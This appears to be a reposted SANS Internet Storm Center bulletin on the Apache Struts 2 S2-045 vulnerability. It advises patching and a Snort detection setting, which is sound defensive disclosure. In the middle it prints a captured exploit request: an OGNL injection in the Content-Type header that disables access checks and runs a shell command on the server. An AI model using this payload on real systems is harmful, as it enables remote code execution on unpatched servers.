Critical Apache Struts 2 Vulnerability (Patch Now!), (Thu, Mar 9th)

by natein Security Bulletinson Posted on

On Monday, Apache released a patch for the Struts 2 framework [1]. The patch fixes an easy to exploit vulnerability in the multipart parser that is typically used for file uploads. A Metasploit module was released that same day, and some readers reported seeing already exploit attempts in the wild.

You should be running Struts 2.3.32 or 2.5.10.1. All prior versions are vulnerable.

Struts 2 is a Java framework that is commonly used by Java-basedweb applications. It is also knowns as Jakarta Struts and Apache Struts. The Apache project currently maintains Struts.

The vulnerability allows an attacker to include code in the Content-Type +http://www.baidu.com/search/spider.html..
Content-Type: %{(#nike=multipart/form-data).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=echo 587d7b356191903a8ff327f548766288).(#iswin=(@java.lang.System@getProperty(os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Referer: http://linux.cn/
Accept-Language: zh-cn
Content-Length: 0
Host: [removed]
Connection: Keep-Alive

Yes… the content type header is quite long. About 800 bytes. It should be easy to catch these exploit attempts with Snort by just setting the max_header_length parameter in the http_inspect preprocessor. I havent tried it yet, but setting this to 500 should work fine (the default is 750, which should work too).

Snort.org included a rule in Tuesdays subscriber update.

[1]https://cwiki.apache.org/confluence/display/WW/S2-045


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Post author

Written by